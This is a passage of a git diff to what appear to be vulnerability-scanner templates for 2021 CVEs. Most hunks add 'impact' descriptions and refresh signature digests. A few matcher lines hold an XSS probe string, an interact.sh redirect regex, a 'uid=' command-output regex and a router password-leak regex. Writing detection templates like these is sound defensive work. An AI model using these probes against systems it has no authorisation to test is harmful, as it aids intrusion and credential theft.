     - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
@@ -38,4 +40,4 @@ http:
         part: body
         words:
           - "<h1> Interactsh Server </h1>"
-# digest: 490a0046304402207ad47a665b3f47c873502692fe3e0dc2ed9828245ea1fbff70ce8473158377220220716adadb837dbff3e106393c7167234a29b738a36dd549b2acdcf9b2f1294e1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100914bbe700383cbf24138df54d10554ca4350e10b5b79eb9aa64429612bdbdab8022100c83c0c16c87ccd50cf67bf28d756fcd15b8472e4875f3dbcdc191ed2facd76ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml
index 57c718e4eb..ac2146db3b 100644
--- a/http/cves/2021/CVE-2021-29505.yaml
+++ b/http/cves/2021/CVE-2021-29505.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: Patched in 1.4.17.
   reference:
     - https://paper.seebug.org/1543/
@@ -112,4 +114,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a0047304502205dc737ff23c455702eb79da37f0d8888ef62d937e6ad1613b1808dccbae1d6b6022100f375f9c24585f9e52cb676c1027ab80129d34186e0bb77c7498fafb8c59164e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a2a040098bcfe81af516d2bb774c882306ff880850adfd589db68a6105f2d992022100c00d549beab826638c4df00a62f1760d9935e2aea60ca37d07281e0a7e44b476:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml
index de869a2e36..f7b5a2fc1d 100644
--- a/http/cves/2021/CVE-2021-29622.yaml
+++ b/http/cves/2021/CVE-2021-29622.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the disclosure of sensitive information.
   remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus.
   reference:
     - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 490a00463044022034f6847d7f925c542023b598dcbe8721e7a93eb2e4e49252688bc53e9251d598022016df2de33dc7b2a69c2a01104b9603e9a6aec17b3881e401a01a9ec3c6a7d301:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210093a2558d8785f90112effc66187ec4d8e5846c3fcba716e0ddaa55cd8a77a24e0220156638d7c1fcd8bcbdd250d87cccd69baa51d4ef0dc73a6f5b7ddabf6304a0b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml
index 00bee29edb..84d12d8b23 100644
--- a/http/cves/2021/CVE-2021-29625.yaml
+++ b/http/cves/2021/CVE-2021-29625.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the Adminer interface, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
   reference:
     - https://sourceforge.net/p/adminer/bugs-and-features/797/
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022000c209a66c017bea211843624a616e73a708c8da82074849369b422539a33d7902210094355bb85161d147d3c6bff8e5497fd00fcb2050fcdc1b8dacdc4a2c9a6dabe2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210099b35de6b768c254a7114a41317d29d7843fda81f0b07643f1f62d202ebcba34022054ae72c150fe675ee05af9345daf212e1cba878ab27e9597f8117f790d0ffde3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml
index 36eb1740c2..651fe6842c 100644
--- a/http/cves/2021/CVE-2021-3002.yaml
+++ b/http/cves/2021/CVE-2021-3002.yaml
@@ -5,6 +5,8 @@ info:
   author: edoardottt
   severity: medium
   description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e8ecb4cd6cadda69f97ac4e0fe9c7b0c26f9aca740324f236a98c560b780cbaf02201923ec3abbb6f3545e9e66ffc4dcf79b5b2e8ca643c30d904fe4a8e8d63096e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202e3af190b1ea5167d641b3ae6a5519828e3ef09b8f2848f910742183e296129702204348b9dc2d73ae179f08bf6754f4d29ea399b7e1dbeec4f688e84c659c2b4edf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml
index 790f7b7f23..2a1238a4e5 100644
--- a/http/cves/2021/CVE-2021-30049.yaml
+++ b/http/cves/2021/CVE-2021-30049.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest patch or upgrade to a non-vulnerable version of SysAid Technologies 20.3.64 b14 to mitigate the XSS vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d347dafd927562cd6e382667efeb67cb3c937fdb2673c901168391d66bbd020c02204f915d6ac58b0781f2b532e6b07580f34561eb88ec19f589bf10b4d29cf18201:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204b9f40100de94dc246cf33f143155322796893f4937a9d6bd209f11502efbb21022100ec01e859883fc6a9776d97d829eccd88f653d274698b1de571db0f82865b3740:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml
index bd858bb342..8033eb54c0 100644
--- a/http/cves/2021/CVE-2021-30128.yaml
+++ b/http/cves/2021/CVE-2021-30128.yaml
@@ -5,6 +5,8 @@ info:
   author: For3stCo1d
   severity: critical
   description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.
   reference:
@@ -65,4 +67,4 @@ http:
         part: body
         words:
           - 'value="errorMessage"'
-# digest: 490a0046304402201a415d706f36a18328c6b7c891a938f261f3a3956f4584ef6b85ef42d76a7ddc0220201ca8dfa1539a3119ded5993f79fa1a57e9b5b5dbec16af2fd012995728d334:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204b3583fe4db5dcfeec1a368045a9953fef25ad9d68ef98a915b0f4c43880d64b022100f2c86059535c032b1d9ea953d9792707012e58638c5edb6309d65eddf29f8d4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml
index e6c0825ba9..66c52c1920 100644
--- a/http/cves/2021/CVE-2021-30134.yaml
+++ b/http/cves/2021/CVE-2021-30134.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100afe8fa1ad07ef17bb604f247d587cfcb592197b50f4f42bf67456c0f5ec0a55d022100dd67747d9c0fed878e250c2b9d7a840a145a81a123afb0e37428153e3f8a1b8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100eddcaa7e3878b2f6ba9a14c26650ddac0014cda2336192c090db70f3cb4fd1a4022100b118ef74b451968b1c9e60ea8590b613ee1151848cbcb4a5861a0b161befb60c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml
index d9ae8a71f8..e4e982ff8d 100644
--- a/http/cves/2021/CVE-2021-30151.yaml
+++ b/http/cves/2021/CVE-2021-30151.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDk
   severity: medium
   description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.
   remediation: |
     Upgrade to Sidekiq version 6.2.0 or later to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201bf8f65a5eacb8151c7f74ee47f1696eafea462cab786f35d17680023157e802022100f6707aa6ba5491f706e36d6b8877ae93d49330720d5bce1bd398dd1d780cd73c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009d605c6b8b029c2799e22f275167f7291d01e19d791e0437ccd6046a00092d99022100eed175cbf6c8c0373e3d15f19ee4229a496313feab04d9c901a3634026332237:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml
index 813e712212..79f59fd4bd 100644
--- a/http/cves/2021/CVE-2021-3017.yaml
+++ b/http/cves/2021/CVE-2021-3017.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
+  impact: |
+    An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network.
   remediation: |
     Update the router firmware to the latest version, which includes a fix for the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
         regex:
           - 'def_wirelesspassword = "([A-Za-z0-9=]+)";'
         part: body
-# digest: 4a0a00473045022100e86d71b68eeb157dc12765df7fe052052ae80d9d07f0ffd6b9c4b53d57c642cb0220062e290cebcf43fff8bc76bd9f2b89260baf6fb1b5a2ce5a58543c5848f26b24:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201e7bad73e52b74a6d5cb90293e81dccf8f83c0f7a98e28df5a4d6209d7cc4725022100f81fd53aeeca1587b73c8d6be67e7e4ca34e65a44f74d85330e23b5a41666e08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml
index 3029260b54..c8dd814852 100644
--- a/http/cves/2021/CVE-2021-30175.yaml
+++ b/http/cves/2021/CVE-2021-30175.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f0432aaac45d2c6c7ed05e1f22f80de1bc60eb9e66b2b7aee78609075955f9b90220727bbfc7f4cac566c208bf81e52f653063884380789cfb20566edc19c3d592e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cd2c12dfe794a969fa221b34fdf57726f9f9dd5bd7588dcac892ade04b699911022100f6ea61c376b0a05f4dedf93245e040537a7fa28c201ed11c185da2a1c10c3133:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml
index 0ee6b20e6c..03efdbf633 100644
--- a/http/cves/2021/CVE-2021-3019.yaml
+++ b/http/cves/2021/CVE-2021-3019.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
   remediation: |
     Apply the latest patch or upgrade to a version that has fixed the vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200c5933e5e2965fcab16db65f0b0405911864f105ec86e34b5a062af45334324c022100ba281abd3e2f4cdb2d66bd096c4c3888c647607c51d948cf192c20e3e83c210b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dc613e38acc0a7e47685ff855ae030d27f88eceb607b2c5f8e43ca215b8ba16f0221008b37940550fc5a69f78d2dfeacb811b2e052ddf1a5ceebf378d50e36b67f463a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml
index abcb9712d4..11f2357272 100644
--- a/http/cves/2021/CVE-2021-30213.yaml
+++ b/http/cves/2021/CVE-2021-30213.yaml
@@ -5,6 +5,8 @@ info:
   author: alph4byt3
   severity: medium
   description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100da8dd9e163e73455272f6962c6114102bf073d0acba2d64ae14894bb1bfbf2e1022100b006cba0890037326a8b351f943cdbb1a3c250cc16989e95e0637b52e13f01a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207d89f92875e4ae93804a8ae05d6b9c6360450827e26abadbb0c9c874eca6148702201131bfce92c3fd0222622d058f736ebd90901525cf676ccce2c680526b02ee5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml
index 303ad238b3..79637b672c 100644
--- a/http/cves/2021/CVE-2021-30461.yaml
+++ b/http/cves/2021/CVE-2021-30461.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing  remote unauthenticated users to trigger a remote PHP code execution vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade VoipMonitor to version 24.61 or later to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205c05f36b047e7eea61df63f8a683bbdb2775ca6db71f7d8ebb8e530ee3804f1f02206491f584a5a08aab6f260e3fd638703b5566a87491f873582ce8f36cddc80b22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220215ac01342e4cbc94f611f4ac97f8550bb49e2539b8aa3ffc836f59beb7145c0022022638782c8dbadf98b3a651caf67698d5a9d10702f5f3ead4c5e1cce186909e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml
index fa9190819f..e823d1d3b9 100644
--- a/http/cves/2021/CVE-2021-30497.yaml
+++ b/http/cves/2021/CVE-2021-30497.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Ivanti to fix the LFI vulnerability in Avalanche 6.3.2.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ddb747a3d6f3acdda10f942bab04e769cda1b5439d81ac2a92b4b7070ff98eb40220592c7c9be8a09f480e7d42e2278f65d8551d71a1bac426fe7ea3c10351e98107:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205d096eddec3d0aa183a9423cb9bb4a1dc98d3257e89616419cf89a14cb90e6f3022100dea4a63450273de89f6680de5eb3f5fc230b6624883959256a0696b64ad5f8f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml
index 89ba17d640..58ac34b268 100644
--- a/http/cves/2021/CVE-2021-3110.yaml
+++ b/http/cves/2021/CVE-2021-3110.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop.
   reference:
@@ -43,4 +45,4 @@ http:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "average_grade")'
         condition: and
-# digest: 4b0a00483046022100a5061f776417239c8592f1557b52350e95d52d120a613adca87951d397eaa26e022100e2d94186fab747b84915c998d2bfc3c59d71d3bd1e028e946b57c239b731d8fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d83b523fcb59db284031ea36c7da8c98a607e08f889f3b82efcf7cea7081061a022044ec50f261f269a280f6e163a77f7182ac1f03b01bc5c79178da0d4c6443388e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml
index eea4b023e7..b3ece52f13 100644
--- a/http/cves/2021/CVE-2021-31195.yaml
+++ b/http/cves/2021/CVE-2021-31195.yaml
@@ -5,6 +5,8 @@ info:
   author: infosecsanyam
   severity: medium
   description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
   remediation: |
     Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022100b4dcd36ac0a21e1c19ce350c0a23339d210d163079a3fae5f39b41213ca8d17402205d7aceda7010b5ffe27961c05a80651edfce441ec8dcedf31575dd517f9b720c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022004256ec369f2a8b0e2cf7654067da474ccb2af9060245fe471117512798a1864022100cacea8cd39c8f95f8f8f4172315e165ca4df79a1dbb68637ff35816e205e6b3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml
index d155d3c64d..e2222896ad 100644
--- a/http/cves/2021/CVE-2021-31249.yaml
+++ b/http/cves/2021/CVE-2021-31249.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, unauthorized access, or data manipulation.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4a0a00473045022010804eac061a681b514a501e2eb881099d5219dd0e90437cb546585e29724caa022100f9a052646281d035ef6ccbc69960f8977e322a3cd5a991dc1a2abe5b7644cd9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220630056cd2113781c832d577e15ee96ca46a015abc59ff8fdda074e5f3b0249d7022100a013ddb0a0f94b3e4fa26cb1457fdf535a4cc13aca64dde9146418a56aa60ea8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml
index 2d26efc3d4..6ae2efc722 100644
--- a/http/cves/2021/CVE-2021-31250.yaml
+++ b/http/cves/2021/CVE-2021-31250.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages.
   reference:
@@ -46,4 +48,4 @@ http:
         part: body
         words:
           - '"><script>alert({{randstr}})</script>'
-# digest: 4a0a004730450220065e872a1d62805ed5b57621f877a1d24aa18db4ac2ead67727c7c25983792310221008f0f801c5fd8646a2e0070f0616cae5152e9986efe26eecd0ba0ef141c8bbe67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100af54ecf1b849065bfc13e424fb5f4821d5d8da192eca7f803353da3e81012186022100fd82507132ca025a2fcf0dc1643c26f1e321702850ce6f51ba2e4509a7e65682:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml
index 98876b0911..c36d14bfcc 100644
--- a/http/cves/2021/CVE-2021-3129.yaml
+++ b/http/cves/2021/CVE-2021-3129.yaml
@@ -5,6 +5,8 @@ info:
   author: z3bd,pdteam
   severity: critical
   description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, potentially allowing an attacker to take control of the affected system.
   remediation: |
     Upgrade Laravel to version 8.4.3 or higher to mitigate this vulnerability.
   reference:
@@ -90,4 +92,4 @@ http:
       - type: regex
         regex:
           - "(u|g)id=.*"
-# digest: 490a0046304402204fa530f9d0d26f6d9de812ad6f7deeb49b9f3b3408feb891d6cce0b1cc57e9ce022042d8c6e0d77547169810ad0c77de8fa9e2a9e065c598e98afb3dfa8215d45a4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ebac0521476f86e01d7a517f352134615efa6ba26f6b785b8f03b12513796d32022100aeb8b3e61842436eea40ddf72d3c114f023fdc20923fc670791f0d3d7aac1940:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml
index 3bb729b91a..bea93f39fd 100644
--- a/http/cves/2021/CVE-2021-31537.yaml
+++ b/http/cves/2021/CVE-2021-31537.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being displayed on web pages.
   reference:
@@ -44,4 +46,4 @@ http:
         part: header
         words:
           - text/html
-# digest: 4a0a004730450220384e671e86bb1e6ba6deca26ae52cff4339ef783e7fbf6855657014ba550c046022100cccec5f4df3e0de26c84536bea1f2033dd7893612fc1983dd3140c1a1c693607:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022073fecc47580d0b5c85d7b2554de26aa39edc0f68347c630c9f63d0a8b19df8eb022020831018b1badcbda7254404e9b973cadb754c1b97c71d53aeb2c47581882e5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml
index be52024f97..bcffc08999 100644
--- a/http/cves/2021/CVE-2021-31581.yaml
+++ b/http/cves/2021/CVE-2021-31581.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as user credentials or system configuration details.
   remediation: This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later.
   reference:
     - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100902ad2da8fd3f7a1f1d02cba135bacdb779f49bd63a1aec209e84b73052fee2e02200b55b247dddc30b9dd9ed1f5bab7c3d4cb28cd0b9d9ac60c2028d6d4e49b0047:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210089e5258ef32b809baffcc2adc5d468416c981664e0cb04a0d57a286e1250b216022065b85471f67002f8745c99a2ccda47b226aa8bd0cff78419b29cd6c6f73deac9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml
index 8bf43a24b4..a2f0244f3e 100644
--- a/http/cves/2021/CVE-2021-31589.yaml
+++ b/http/cves/2021/CVE-2021-31589.yaml
@@ -5,6 +5,8 @@ info:
   author: Ahmed Abou-Ela
   severity: medium
   description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement.
   remediation: |
     Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a47b4200d4e81fbb465a15da3f59e1652de9c8007f3032e041cf754c6774ef0b022100b89ccde10dad8e526a378c392416b8fca59437cc39ab3b8ee44c0918a6ddaedb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
